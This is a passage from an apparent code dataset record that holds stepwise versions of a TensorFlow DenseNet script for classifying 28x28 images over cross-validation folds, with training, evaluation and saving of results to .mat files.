s, 1], [1, s, s, 1], 'SAME')\n\n def conv2d_1(input, in_features, out_features, kernel_size, name=\n 'W', with_bias=False):\n W = weight_variable([kernel_size, kernel_size, in_features,\n out_features], name)\n conv = tf.nn.conv2d(input, W, [1, 1, 1, 1], padding='SAME')\n if 
with_bias:\n return conv + bias_variable([out_features])\n return conv\n\n def batch_activ_conv(current, in_features, out_features,\n kernel_size, is_training, keep_prob, idx, scope='conv_block'):\n with tf.variable_scope(scope):\n current = tf.layers.batch_normalization(current, scale=True,\n training=is_training)\n current = tf.nn.relu(current)\n current = conv2d_1(current, in_features, out_features,\n kernel_size, name='W' + str(idx))\n current = tf.nn.dropout(current, keep_prob)\n return current\n\n def block(input, layers, in_features, growth, is_training,\n keep_prob, name='Block_'):\n with tf.name_scope(name):\n with tf.variable_scope(name):\n current = input\n features = in_features\n for idx in range(layers):\n tmp = batch_activ_conv(current, features, growth,\n fs, is_training, keep_prob, idx + 1, scope=\n 'conv_block_' + str(idx + 1))\n current = tf.concat((current, tmp), axis=3)\n features += growth\n return current, features\n x = tf.placeholder(tf.float32, shape=[None, 784])\n y_ = tf.placeholder(tf.float32, shape=[None, number_of_classes])\n x_image = tf.reshape(x, [-1, 28, 28, 1])\n keep_prob = tf.placeholder(tf.float32)\n training = tf.placeholder(tf.bool)\n current = conv2d_1(x_image, 1, fm1, fs, name='W1', with_bias=False)\n current, features = block(current, num_layers, fm1, k_fm, training,\n keep_prob, name='Block_1')\n b1_conv_printop = tf.Print(current, [current])\n with tf.name_scope('transition_lyr'):\n current = batch_activ_conv(current, features, bottleneck * k_fm,\n 1, training, keep_prob, 1, scope='Transition_layer_1')\n t1_b_conv_printop = tf.Print(current, [current])\n current = batch_activ_conv(current, bottleneck * k_fm, features,\n fs, training, keep_prob, 1, scope='Transition_layer_1_1')\n t1_conv_printop = tf.Print(current, [current])\n current = max_pool(current, 2)\n current, features = block(current, num_layers, features, k_fm,\n training, keep_prob, name='Block_2')\n b2_conv_printop = tf.Print(current, [current])\n with tf.name_scope('transition_lyr_2'):\n current = batch_activ_conv(current, features, bottleneck * k_fm,\n 1, training, keep_prob, 1, scope='Transition_layer_2')\n t2_b_conv_printop = tf.Print(current, [current])\n current = batch_activ_conv(current, bottleneck * k_fm, features,\n fs, training, keep_prob, 1, scope='Transition_layer_2_1')\n t2_conv_printop = tf.Print(current, [current])\n current = max_pool(current, 2)\n current, features = block(current, num_layers, features, k_fm,\n training, keep_prob, name='Block_3')\n b3_conv_printop = tf.Print(current, [current])\n with tf.name_scope('transition_lyr_3'):\n current = batch_activ_conv(current, features, bottleneck * k_fm,\n 1, training, keep_prob, 1, scope='Transition_layer_3')\n t3_b_conv_printop = tf.Print(current, [current])\n current = batch_activ_conv(current, bottleneck * k_fm, features,\n fs, training, keep_prob, 1, scope='Transition_layer_3_1')\n t3_conv_printop = tf.Print(current, [current])\n current = avg_pool(current, 7)\n current = tf.reshape(current, [tf.shape(current)[0], -1])\n with tf.name_scope('Dense_Last_lyr'):\n W_fc3 = weight_variable([fc_nodes[0], number_of_classes], 'w_fc3')\n b_fc3 = bias_variable([number_of_classes], 'b_fc3')\n y_conv = tf.matmul(current, W_fc3) + b_fc3\n prediction_prob = tf.nn.softmax(y_conv)\n prediction_prob_printop = tf.Print(prediction_prob, [\n prediction_prob])\n with tf.name_scope('Xent'):\n cross_entropy = tf.reduce_mean(tf.nn.\n softmax_cross_entropy_with_logits(labels=y_, logits=y_conv))\n with tf.name_scope('train'):\n 
extra_update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n with tf.control_dependencies(extra_update_ops):\n train_step = tf.train.AdamOptimizer(learn_rate).minimize(\n cross_entropy)\n with tf.name_scope('accuracy'):\n correct_prediction = tf.equal(tf.argmax(y_conv, 1), tf.argmax(\n y_, 1))\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n wrong_prediction = tf.not_equal(tf.argmax(y_conv, 1), tf.argmax\n (y_, 1))\n wrong_prediction_printop = tf.Print(wrong_prediction, [\n wrong_prediction])\n predicted_labels = tf.argmax(y_conv, 1)\n predicted_labels_printop = tf.Print(predicted_labels, [\n predicted_labels])\n index = 0\n index_end = index + batch_size\n remaining = 0\n start_time = time.time()\n costs = []\n accuracy_list = []\n list_of_predicted_list = []\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer(), tf.set_random_seed(0))\n for i in range(iteration):\n if index_end > total_trainImages:\n remaining = total_trainImages - (index_end - batch_size)\n images = Train_Images[index_end - batch_size:\n total_trainImages, :]\n labels = Train_Labels[index_end - batch_size:\n total_trainImages, :]\n index = 0\n index_end = index + batch_size - remaining\n images = np.vstack((images, Train_Images[index:\n index_end, :]))\n labels = np.vstack((labels, Train_Labels[index:\n index_end, :]))\n batch = images, labels\n index = index_end\n index_end = index + batch_size\n else:\n batch = Train_Images[index:index_end, :], Train_Labels[\n index:index_end, :]\n index = index + batch_size\n index_end = index_end + batch_size\n if i in list_to_display:\n elapsed_time = time.time() - start_time\n print('Elapsed Time Before for loop: %f secs' %\n elapsed_time)\n Accuracy = 0\n itrt_index = i\n print('debug: %d & %d' % (iteration, i))\n if Dataset == '1':\n if file_name == '5th_fold':\n num_test = 13154\n else:\n num_test = 13155\n elif Dataset == '2':\n num_test = 503\n elif Dataset == '3':\n num_test = 400\n print(num_test)\n for img_index in range(num_test):\n t_image = np.array(Test_Images[img_index, :]).reshape(\n 1, 784)\n t_label = np.array(Test_Labels[img_index, :]).reshape(\n 1, number_of_classes)\n test_acc = accuracy.eval(feed_dict={x: t_image, y_:\n t_label, keep_prob: 1.0, training: False})\n Accuracy += test_acc\n wrong, predicted, prediction_prob = sess.run([\n wrong_prediction_printop,\n predicted_labels_printop,\n prediction_prob_printop], feed_dict={x: t_image,\n y_: t_label, keep_prob: 1.0, training: False})\n if img_index <= 3:\n b1, b2, b3, t1, t2, t3, t1_b, t2_b, t3_b = (sess\n .run([b1_conv_printop, b2_conv_printop,\n b3_conv_printop, t1_conv_printop,\n t2_conv_printop, t3_conv_printop,\n t1_b_conv_printop, t2_b_conv_printop,\n t3_b_conv_printop], feed_dict={x: t_image,\n y_: t_label, keep_prob: 1.0, training: False}))\n if img_index == 0:\n b1_list = b1\n b2_list = b2\n b3_list = b3\n t1_list = t1\n t2_list = t2\n t3_list = t3\n t1_b_list = t1_b\n t2_b_list = t2_b\n t3_b_list = t3_b\n else:\n b1_list = np.append(b1_list, b1, axis=0)\n b2_list = np.append(b2_list, b2, axis=0)\n b3_list = np.append(b3_list, b3, axis=0)\n t1_list = np.append(t1_list, t1, axis=0)\n t2_list = np.append(t2_list, t2, axis=0)\n t3_list = np.append(t3_list, t3, axis=0)\n t1_b_list = np.append(t1_b_list, t1_b, axis=0)\n t2_b_list = np.append(t2_b_list, t2_b, axis=0)\n t3_b_list = np.append(t3_b_list, t3_b, axis=0)\n if img_index == 0:\n wrong_list_1 = wrong\n predicted_list_1 = predicted\n prediction_prob_1 = prediction_prob\n else:\n wrong_list_1 = 
np.append(wrong_list_1, wrong,\n axis=0)\n predicted_list_1 = np.append(predicted_list_1,\n predicted, axis=0)\n prediction_prob_1 = np.append(prediction_prob_1,\n prediction_prob)\n Accuracy = Accuracy / num_test\n accuracy_list.append(Accuracy)\n list_of_predicted_list.append(predicted_list_1)\n print('Average test accuracy: %g' % Accuracy)\n epoch_around = math.ceil(itrt_index * batch_size /\n total_trainImages)\n sio.savemat('D' + Dataset + '_' + file_name + '_' + str\n (epoch_around) + 'ep_' + data_type +\n '_predicted_labels_list.mat', {'wrong_list':\n wrong_list_1, 'predicted_list': predicted_list_1,\n 'Target_labels': Target_labels, 'prediction_prob':\n prediction_prob, 'b1_list': b1_list, 'b2_list':\n b2_list, 'b3_list': b3_list, 't1_list': t1_list,\n 't2_list': t2_list, 't3_list': t3_list, 't1_b_list':\n t1_b_list, 't2_b_list': t2_b_list, 't3_b_list':\n t3_b_list})\n elapsed_time = time.time() - start_time\n print('Elapsed Time: %f secs' % elapsed_time)\n print(\n 'Batch Size & Iteration & Total Train Imgs : %d & %d & %d'\n % (batch_size, itrt_index, total_trainImages))\n print('learning_rate : %g ' % learn_rate)\n print('1st conv FMaps : %d ' % fm1)\n print('number of layers in dense block : %d ' % num_layers)\n print('growth rate(k_fm) : %d ' % k_fm)\n print('filter size : %d ' % fs)\n print('bottleneck : %d' % bottleneck)\n print('dropout prob : %g ' % dropout_prob)\n print('data_type :', data_type)\n print('file_name :', file_name)\n print('FC nodes : %d' % fc_nodes[0])\n epoch_around = itrt_index * batch_size / total_trainImages\n print('Number of epochs : %f ' % epoch_around)\n plt.plot(np.squeeze(costs))\n plt.ylabel('cost')\n plt.xlabel('iterations (per tens)')\n plt.title('Learning rate =' + str(learn_rate))\n plt.show()\n if i % 100 == 0:\n train_accuracy = accuracy.eval(feed_dict={x: batch[0],\n y_: batch[1], keep_prob: 1.0, training: False})\n print('step %d, training accuracy %g' % (i, train_accuracy)\n )\n _, loss = sess.run([train_step, cross_entropy], feed_dict={\n x: batch[0], y_: batch[1], keep_prob: dropout_prob,\n training: True})\n iteration_cost = 0\n num_minibatches = int(total_trainImages / batch_size)\n iteration_cost += loss / num_minibatches\n costs.append(iteration_cost)\n if i % 100 == 0:\n print('Loss: ', loss)\n Accuracy = 0\n training_time = time.time() - start_time\n print('Training Time: %f secs' % training_time)\n if Dataset == '1':\n if file_name == '5th_fold':\n num_test = 13154\n else:\n num_test = 13155\n elif Dataset == '2':\n num_test = 503\n elif Dataset == '3':\n num_test = 400\n print(num_test)\n for img_index in range(num_test):\n t_image = np.array(Test_Images[img_index, :]).reshape(1, 784)\n t_label = np.array(Test_Labels[img_index, :]).reshape(1,\n number_of_classes)\n test_acc = accuracy.eval(feed_dict={x: t_image, y_: t_label,\n keep_prob: 1.0, training: False})\n Accuracy += test_acc\n wrong, predicted = sess.run([wrong_prediction_printop,\n predicted_labels_printop], feed_dict={x: t_image, y_:\n t_label, keep_prob: 1.0, training: False})\n if img_index <= 3:\n b1, b2, b3, t1, t2, t3, t1_b, t2_b, t3_b = sess.run([\n b1_conv_printop, b2_conv_printop, b3_conv_printop,\n t1_conv_printop, t2_conv_printop, t3_conv_printop,\n t1_b_conv_printop, t2_b_conv_printop,\n t3_b_conv_printop], feed_dict={x: t_image, y_:\n t_label, keep_prob: 1.0, training: False})\n if img_index == 0:\n b1_list = b1\n b2_list = b2\n b3_list = b3\n t1_list = t1\n t2_list = t2\n t3_list = t3\n t1_b_list = t1_b\n t2_b_list = t2_b\n t3_b_list = t3_b\n else:\n 
b1_list = np.append(b1_list, b1, axis=0)\n b2_list = np.append(b2_list, b2, axis=0)\n b3_list = np.append(b3_list, b3, axis=0)\n t1_list = np.append(t1_list, t1, axis=0)\n t2_list = np.append(t2_list, t2, axis=0)\n t3_list = np.append(t3_list, t3, axis=0)\n t1_b_list = np.append(t1_b_list, t1_b, axis=0)\n t2_b_list = np.append(t2_b_list, t2_b, axis=0)\n t3_b_list = np.append(t3_b_list, t3_b, axis=0)\n if img_index == 0:\n wrong_list = wrong\n predicted_list = predicted\n else:\n wrong_list = np.append(wrong_list, wrong, axis=0)\n predicted_list = np.append(predicted_list, predicted,\n axis=0)\n Accuracy = Accuracy / num_test\n print('Average test accuracy: %g' % Accuracy)\n accuracy_list.append(Accuracy)\n list_of_predicted_list.append(predicted_list)\n elapsed_time = time.time() - start_time\n print('Elapsed Time: %f secs' % elapsed_time)\n print(\n 'Batch Size & Iteration & Total Train Imgs : %d & %d & %d' %\n (batch_size, itrt_index, total_trainImages))\n print('learning_rate : %g ' % learn_rate)\n print('1st conv FMaps : %d ' % fm1)\n print('number of layers in dense block : %d ' % num_layers)\n print('growth rate(k_fm) : %d ' % k_fm)\n print('filter size : %d ' % fs)\n print('bottleneck : %d' % bottleneck)\n print('dropout prob : %g ' % dropout_prob)\n print('data_type :', data_type)\n print('file_name :', file_name)\n print('FC nodes : %d' % fc_nodes[0])\n epoch_around = math.ceil(iteration * batch_size / total_trainImages\n )\n if epoch_around == 51:\n epoch_around = 50\n print('Number of epochs : %f ' % epoch_around)\n plt.plot(np.squeeze(costs))\n plt.ylabel('cost')\n plt.xlabel('iterations (per tens)')\n plt.title('Learning rate =' + str(learn_rate))\n plt.show()\n sio.savemat('D' + Dataset + '_' + file_name + '_' + str(\n epoch_around) + 'ep_' + data_type +\n '_predicted_labels_list.mat', {'wrong_list': wrong_list,\n 'predicted_list': predicted_list, 'Target_labels':\n Target_labels, 'accuracy_list': accuracy_list,\n 'list_of_predicted_list': list_of_predicted_list, 'costs':\n costs, 'b1_list': b1_list, 'b2_list': b2_list, 'b3_list':\n b3_list, 't1_list': t1_list, 't2_list': t2_list, 't3_list':\n t3_list, 't1_b_list': t1_b_list, 't2_b_list': t2_b_list,\n 't3_b_list': t3_b_list})\n\n\nclass MyModel:\n num_layers = 4\n k_fm = 24\n fs = 3\n fm1 = 32\n bottleneck = 4\n dropout_prob = 0.8\n batch_size = [16]\n learn_rate = 0.001\n num_of_test = 40\n\n\n<mask token>\n",
"step-4": "def densenet(D, DT, F, model):\n import scipy.io as sio\n import time\n import os\n import math\n import numpy as np\n import matplotlib.pyplot as plt\n Dataset = D\n if DT == 'org':\n data_type = 'original'\n else:\n data_type = 'augmented'\n fs = model.fs\n fm1 = model.fm1\n batch_size = model.batch_size[0]\n learn_rate = model.learn_rate\n num_layers = model.num_layers\n k_fm = model.k_fm\n bottleneck = model.bottleneck\n dropout_prob = model.dropout_prob\n num_of_test = model.num_of_test\n if F == 1:\n file_name = '1st_fold'\n elif F == 2:\n file_name = '2nd_fold'\n elif F == 3:\n file_name = '3rd_fold'\n elif F == 4:\n file_name = '4th_fold'\n elif F == 5:\n file_name = '5th_fold'\n path = os.path.join('CrossVal', 'D' + Dataset)\n print('path ', path)\n if data_type == 'original':\n Train = sio.loadmat(os.path.join(path, 'D' + Dataset + '_' +\n file_name + '_train.mat'))\n else:\n Train = sio.loadmat(os.path.join(path, 'Augmented_D' + Dataset +\n '_' + file_name + '_train.mat'))\n Test = sio.loadmat(os.path.join(path, 'D' + Dataset + '_' + file_name +\n '_test.mat'))\n if Dataset == '1':\n number_of_classes = 24\n num_of_ep = 50\n num_of_test = 20\n if data_type == 'augmented':\n train_imgs = 526190\n else:\n train_imgs = 52619\n iteration = math.ceil(num_of_ep * train_imgs / batch_size)\n elif Dataset == '2':\n number_of_classes = 36\n num_of_ep = 200\n if data_type == 'augmented':\n train_imgs = 20120\n else:\n train_imgs = 2012\n iteration = math.ceil(num_of_ep * train_imgs / batch_size)\n else:\n number_of_classes = 10\n num_of_ep = 200\n if data_type == 'augmented':\n train_imgs = 16000\n else:\n train_imgs = 1600\n iteration = math.ceil(num_of_ep * train_imgs / batch_size)\n iteration_to_display = int(iteration / num_of_test)\n list_to_display = []\n for i in range(num_of_test):\n if i != num_of_test:\n list_to_display.append(int(iteration_to_display * (i + 1)))\n del i\n total_fm_Block_1 = fm1 + num_layers * k_fm\n total_fm_Block_2 = total_fm_Block_1 + num_layers * k_fm\n total_fm_Block_3 = total_fm_Block_2 + num_layers * k_fm\n fc_nodes = [total_fm_Block_3]\n Train_Images = Train['trainImages']\n Train_Labels = Train['trainLabels2']\n total_trainImages = len(Train_Images[0, 2])\n print(total_trainImages)\n Train_Images = Train_Images.reshape(784, total_trainImages).transpose(\n ).astype('float32')\n Train_Labels = Train_Labels.transpose().astype('float64')\n Test_Images = Test['testImages']\n Test_Labels = Test['testLabels2']\n total_testImages = len(Test_Images[0, 2])\n Test_Images = Test_Images.reshape(784, total_testImages).transpose(\n ).astype('float32')\n Test_Labels = Test_Labels.transpose().astype('float64')\n Target_labels = np.argmax(Test_Labels, axis=1)\n del Test\n del Train\n import tensorflow as tf\n tf.reset_default_graph()\n g = tf.Graph()\n with g.as_default():\n tf.set_random_seed(1)\n\n def weight_variable(shape, n):\n initial = tf.truncated_normal(shape, stddev=0.1)\n return tf.Variable(initial, name=n)\n\n def bias_variable(shape, n):\n initial = tf.constant(0.1, shape=shape)\n return tf.Variable(initial, name=n)\n\n def avg_pool(input, s):\n return tf.nn.avg_pool(input, [1, s, s, 1], [1, s, s, 1], 'SAME')\n\n def max_pool(input, s):\n return tf.nn.max_pool(input, [1, s, s, 1], [1, s, s, 1], 'SAME')\n\n def conv2d_1(input, in_features, out_features, kernel_size, name=\n 'W', with_bias=False):\n W = weight_variable([kernel_size, kernel_size, in_features,\n out_features], name)\n conv = tf.nn.conv2d(input, W, [1, 1, 1, 1], padding='SAME')\n if 
with_bias:\n return conv + bias_variable([out_features])\n return conv\n\n def batch_activ_conv(current, in_features, out_features,\n kernel_size, is_training, keep_prob, idx, scope='conv_block'):\n with tf.variable_scope(scope):\n current = tf.layers.batch_normalization(current, scale=True,\n training=is_training)\n current = tf.nn.relu(current)\n current = conv2d_1(current, in_features, out_features,\n kernel_size, name='W' + str(idx))\n current = tf.nn.dropout(current, keep_prob)\n return current\n\n def block(input, layers, in_features, growth, is_training,\n keep_prob, name='Block_'):\n with tf.name_scope(name):\n with tf.variable_scope(name):\n current = input\n features = in_features\n for idx in range(layers):\n tmp = batch_activ_conv(current, features, growth,\n fs, is_training, keep_prob, idx + 1, scope=\n 'conv_block_' + str(idx + 1))\n current = tf.concat((current, tmp), axis=3)\n features += growth\n return current, features\n x = tf.placeholder(tf.float32, shape=[None, 784])\n y_ = tf.placeholder(tf.float32, shape=[None, number_of_classes])\n x_image = tf.reshape(x, [-1, 28, 28, 1])\n keep_prob = tf.placeholder(tf.float32)\n training = tf.placeholder(tf.bool)\n current = conv2d_1(x_image, 1, fm1, fs, name='W1', with_bias=False)\n current, features = block(current, num_layers, fm1, k_fm, training,\n keep_prob, name='Block_1')\n b1_conv_printop = tf.Print(current, [current])\n with tf.name_scope('transition_lyr'):\n current = batch_activ_conv(current, features, bottleneck * k_fm,\n 1, training, keep_prob, 1, scope='Transition_layer_1')\n t1_b_conv_printop = tf.Print(current, [current])\n current = batch_activ_conv(current, bottleneck * k_fm, features,\n fs, training, keep_prob, 1, scope='Transition_layer_1_1')\n t1_conv_printop = tf.Print(current, [current])\n current = max_pool(current, 2)\n current, features = block(current, num_layers, features, k_fm,\n training, keep_prob, name='Block_2')\n b2_conv_printop = tf.Print(current, [current])\n with tf.name_scope('transition_lyr_2'):\n current = batch_activ_conv(current, features, bottleneck * k_fm,\n 1, training, keep_prob, 1, scope='Transition_layer_2')\n t2_b_conv_printop = tf.Print(current, [current])\n current = batch_activ_conv(current, bottleneck * k_fm, features,\n fs, training, keep_prob, 1, scope='Transition_layer_2_1')\n t2_conv_printop = tf.Print(current, [current])\n current = max_pool(current, 2)\n current, features = block(current, num_layers, features, k_fm,\n training, keep_prob, name='Block_3')\n b3_conv_printop = tf.Print(current, [current])\n with tf.name_scope('transition_lyr_3'):\n current = batch_activ_conv(current, features, bottleneck * k_fm,\n 1, training, keep_prob, 1, scope='Transition_layer_3')\n t3_b_conv_printop = tf.Print(current, [current])\n current = batch_activ_conv(current, bottleneck * k_fm, features,\n fs, training, keep_prob, 1, scope='Transition_layer_3_1')\n t3_conv_printop = tf.Print(current, [current])\n current = avg_pool(current, 7)\n current = tf.reshape(current, [tf.shape(current)[0], -1])\n with tf.name_scope('Dense_Last_lyr'):\n W_fc3 = weight_variable([fc_nodes[0], number_of_classes], 'w_fc3')\n b_fc3 = bias_variable([number_of_classes], 'b_fc3')\n y_conv = tf.matmul(current, W_fc3) + b_fc3\n prediction_prob = tf.nn.softmax(y_conv)\n prediction_prob_printop = tf.Print(prediction_prob, [\n prediction_prob])\n with tf.name_scope('Xent'):\n cross_entropy = tf.reduce_mean(tf.nn.\n softmax_cross_entropy_with_logits(labels=y_, logits=y_conv))\n with tf.name_scope('train'):\n 
extra_update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n with tf.control_dependencies(extra_update_ops):\n train_step = tf.train.AdamOptimizer(learn_rate).minimize(\n cross_entropy)\n with tf.name_scope('accuracy'):\n correct_prediction = tf.equal(tf.argmax(y_conv, 1), tf.argmax(\n y_, 1))\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n wrong_prediction = tf.not_equal(tf.argmax(y_conv, 1), tf.argmax\n (y_, 1))\n wrong_prediction_printop = tf.Print(wrong_prediction, [\n wrong_prediction])\n predicted_labels = tf.argmax(y_conv, 1)\n predicted_labels_printop = tf.Print(predicted_labels, [\n predicted_labels])\n index = 0\n index_end = index + batch_size\n remaining = 0\n start_time = time.time()\n costs = []\n accuracy_list = []\n list_of_predicted_list = []\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer(), tf.set_random_seed(0))\n for i in range(iteration):\n if index_end > total_trainImages:\n remaining = total_trainImages - (index_end - batch_size)\n images = Train_Images[index_end - batch_size:\n total_trainImages, :]\n labels = Train_Labels[index_end - batch_size:\n total_trainImages, :]\n index = 0\n index_end = index + batch_size - remaining\n images = np.vstack((images, Train_Images[index:\n index_end, :]))\n labels = np.vstack((labels, Train_Labels[index:\n index_end, :]))\n batch = images, labels\n index = index_end\n index_end = index + batch_size\n else:\n batch = Train_Images[index:index_end, :], Train_Labels[\n index:index_end, :]\n index = index + batch_size\n index_end = index_end + batch_size\n if i in list_to_display:\n elapsed_time = time.time() - start_time\n print('Elapsed Time Before for loop: %f secs' %\n elapsed_time)\n Accuracy = 0\n itrt_index = i\n print('debug: %d & %d' % (iteration, i))\n if Dataset == '1':\n if file_name == '5th_fold':\n num_test = 13154\n else:\n num_test = 13155\n elif Dataset == '2':\n num_test = 503\n elif Dataset == '3':\n num_test = 400\n print(num_test)\n for img_index in range(num_test):\n t_image = np.array(Test_Images[img_index, :]).reshape(\n 1, 784)\n t_label = np.array(Test_Labels[img_index, :]).reshape(\n 1, number_of_classes)\n test_acc = accuracy.eval(feed_dict={x: t_image, y_:\n t_label, keep_prob: 1.0, training: False})\n Accuracy += test_acc\n wrong, predicted, prediction_prob = sess.run([\n wrong_prediction_printop,\n predicted_labels_printop,\n prediction_prob_printop], feed_dict={x: t_image,\n y_: t_label, keep_prob: 1.0, training: False})\n if img_index <= 3:\n b1, b2, b3, t1, t2, t3, t1_b, t2_b, t3_b = (sess\n .run([b1_conv_printop, b2_conv_printop,\n b3_conv_printop, t1_conv_printop,\n t2_conv_printop, t3_conv_printop,\n t1_b_conv_printop, t2_b_conv_printop,\n t3_b_conv_printop], feed_dict={x: t_image,\n y_: t_label, keep_prob: 1.0, training: False}))\n if img_index == 0:\n b1_list = b1\n b2_list = b2\n b3_list = b3\n t1_list = t1\n t2_list = t2\n t3_list = t3\n t1_b_list = t1_b\n t2_b_list = t2_b\n t3_b_list = t3_b\n else:\n b1_list = np.append(b1_list, b1, axis=0)\n b2_list = np.append(b2_list, b2, axis=0)\n b3_list = np.append(b3_list, b3, axis=0)\n t1_list = np.append(t1_list, t1, axis=0)\n t2_list = np.append(t2_list, t2, axis=0)\n t3_list = np.append(t3_list, t3, axis=0)\n t1_b_list = np.append(t1_b_list, t1_b, axis=0)\n t2_b_list = np.append(t2_b_list, t2_b, axis=0)\n t3_b_list = np.append(t3_b_list, t3_b, axis=0)\n if img_index == 0:\n wrong_list_1 = wrong\n predicted_list_1 = predicted\n prediction_prob_1 = prediction_prob\n else:\n wrong_list_1 = 
np.append(wrong_list_1, wrong,\n axis=0)\n predicted_list_1 = np.append(predicted_list_1,\n predicted, axis=0)\n prediction_prob_1 = np.append(prediction_prob_1,\n prediction_prob)\n Accuracy = Accuracy / num_test\n accuracy_list.append(Accuracy)\n list_of_predicted_list.append(predicted_list_1)\n print('Average test accuracy: %g' % Accuracy)\n epoch_around = math.ceil(itrt_index * batch_size /\n total_trainImages)\n sio.savemat('D' + Dataset + '_' + file_name + '_' + str\n (epoch_around) + 'ep_' + data_type +\n '_predicted_labels_list.mat', {'wrong_list':\n wrong_list_1, 'predicted_list': predicted_list_1,\n 'Target_labels': Target_labels, 'prediction_prob':\n prediction_prob, 'b1_list': b1_list, 'b2_list':\n b2_list, 'b3_list': b3_list, 't1_list': t1_list,\n 't2_list': t2_list, 't3_list': t3_list, 't1_b_list':\n t1_b_list, 't2_b_list': t2_b_list, 't3_b_list':\n t3_b_list})\n elapsed_time = time.time() - start_time\n print('Elapsed Time: %f secs' % elapsed_time)\n print(\n 'Batch Size & Iteration & Total Train Imgs : %d & %d & %d'\n % (batch_size, itrt_index, total_trainImages))\n print('learning_rate : %g ' % learn_rate)\n print('1st conv FMaps : %d ' % fm1)\n print('number of layers in dense block : %d ' % num_layers)\n print('growth rate(k_fm) : %d ' % k_fm)\n print('filter size : %d ' % fs)\n print('bottleneck : %d' % bottleneck)\n print('dropout prob : %g ' % dropout_prob)\n print('data_type :', data_type)\n print('file_name :', file_name)\n print('FC nodes : %d' % fc_nodes[0])\n epoch_around = itrt_index * batch_size / total_trainImages\n print('Number of epochs : %f ' % epoch_around)\n plt.plot(np.squeeze(costs))\n plt.ylabel('cost')\n plt.xlabel('iterations (per tens)')\n plt.title('Learning rate =' + str(learn_rate))\n plt.show()\n if i % 100 == 0:\n train_accuracy = accuracy.eval(feed_dict={x: batch[0],\n y_: batch[1], keep_prob: 1.0, training: False})\n print('step %d, training accuracy %g' % (i, train_accuracy)\n )\n _, loss = sess.run([train_step, cross_entropy], feed_dict={\n x: batch[0], y_: batch[1], keep_prob: dropout_prob,\n training: True})\n iteration_cost = 0\n num_minibatches = int(total_trainImages / batch_size)\n iteration_cost += loss / num_minibatches\n costs.append(iteration_cost)\n if i % 100 == 0:\n print('Loss: ', loss)\n Accuracy = 0\n training_time = time.time() - start_time\n print('Training Time: %f secs' % training_time)\n if Dataset == '1':\n if file_name == '5th_fold':\n num_test = 13154\n else:\n num_test = 13155\n elif Dataset == '2':\n num_test = 503\n elif Dataset == '3':\n num_test = 400\n print(num_test)\n for img_index in range(num_test):\n t_image = np.array(Test_Images[img_index, :]).reshape(1, 784)\n t_label = np.array(Test_Labels[img_index, :]).reshape(1,\n number_of_classes)\n test_acc = accuracy.eval(feed_dict={x: t_image, y_: t_label,\n keep_prob: 1.0, training: False})\n Accuracy += test_acc\n wrong, predicted = sess.run([wrong_prediction_printop,\n predicted_labels_printop], feed_dict={x: t_image, y_:\n t_label, keep_prob: 1.0, training: False})\n if img_index <= 3:\n b1, b2, b3, t1, t2, t3, t1_b, t2_b, t3_b = sess.run([\n b1_conv_printop, b2_conv_printop, b3_conv_printop,\n t1_conv_printop, t2_conv_printop, t3_conv_printop,\n t1_b_conv_printop, t2_b_conv_printop,\n t3_b_conv_printop], feed_dict={x: t_image, y_:\n t_label, keep_prob: 1.0, training: False})\n if img_index == 0:\n b1_list = b1\n b2_list = b2\n b3_list = b3\n t1_list = t1\n t2_list = t2\n t3_list = t3\n t1_b_list = t1_b\n t2_b_list = t2_b\n t3_b_list = t3_b\n else:\n 
b1_list = np.append(b1_list, b1, axis=0)\n b2_list = np.append(b2_list, b2, axis=0)\n b3_list = np.append(b3_list, b3, axis=0)\n t1_list = np.append(t1_list, t1, axis=0)\n t2_list = np.append(t2_list, t2, axis=0)\n t3_list = np.append(t3_list, t3, axis=0)\n t1_b_list = np.append(t1_b_list, t1_b, axis=0)\n t2_b_list = np.append(t2_b_list, t2_b, axis=0)\n t3_b_list = np.append(t3_b_list, t3_b, axis=0)\n if img_index == 0:\n wrong_list = wrong\n predicted_list = predicted\n else:\n wrong_list = np.append(wrong_list, wrong, axis=0)\n predicted_list = np.append(predicted_list, predicted,\n axis=0)\n Accuracy = Accuracy / num_test\n print('Average test accuracy: %g' % Accuracy)\n accuracy_list.append(Accuracy)\n list_of_predicted_list.append(predicted_list)\n elapsed_time = time.time() - start_time\n print('Elapsed Time: %f secs' % elapsed_time)\n print(\n 'Batch Size & Iteration & Total Train Imgs : %d & %d & %d' %\n (batch_size, itrt_index, total_trainImages))\n print('learning_rate : %g ' % learn_rate)\n print('1st conv FMaps : %d ' % fm1)\n print('number of layers in dense block : %d ' % num_layers)\n print('growth rate(k_fm) : %d ' % k_fm)\n print('filter size : %d ' % fs)\n print('bottleneck : %d' % bottleneck)\n print('dropout prob : %g ' % dropout_prob)\n print('data_type :', data_type)\n print('file_name :', file_name)\n print('FC nodes : %d' % fc_nodes[0])\n epoch_around = math.ceil(iteration * batch_size / total_trainImages\n )\n if epoch_around == 51:\n epoch_around = 50\n print('Number of epochs : %f ' % epoch_around)\n plt.plot(np.squeeze(costs))\n plt.ylabel('cost')\n plt.xlabel('iterations (per tens)')\n plt.title('Learning rate =' + str(learn_rate))\n plt.show()\n sio.savemat('D' + Dataset + '_' + file_name + '_' + str(\n epoch_around) + 'ep_' + data_type +\n '_predicted_labels_list.mat', {'wrong_list': wrong_list,\n 'predicted_list': predicted_list, 'Target_labels':\n Target_labels, 'accuracy_list': accuracy_list,\n 'list_of_predicted_list': list_of_predicted_list, 'costs':\n costs, 'b1_list': b1_list, 'b2_list': b2_list, 'b3_list':\n b3_list, 't1_list': t1_list, 't2_list': t2_list, 't3_list':\n t3_list, 't1_b_list': t1_b_list, 't2_b_list': t2_b_list,\n 't3_b_list': t3_b_list})\n\n\nclass MyModel:\n num_layers = 4\n k_fm = 24\n fs = 3\n fm1 = 32\n bottleneck = 4\n dropout_prob = 0.8\n batch_size = [16]\n learn_rate = 0.001\n num_of_test = 40\n\n\nmodel = MyModel()\ndensenet('1', 'org', 1, model)\ndensenet('1', 'org', 2, model)\ndensenet('1', 'org', 3, model)\ndensenet('1', 'org', 4, model)\ndensenet('1', 'org', 5, model)\ndensenet('1', 'aug', 1, model)\ndensenet('1', 'aug', 2, model)\ndensenet('1', 'aug', 3, model)\ndensenet('1', 'aug', 4, model)\ndensenet('1', 'aug', 5, model)\ndensenet('2', 'org', 1, 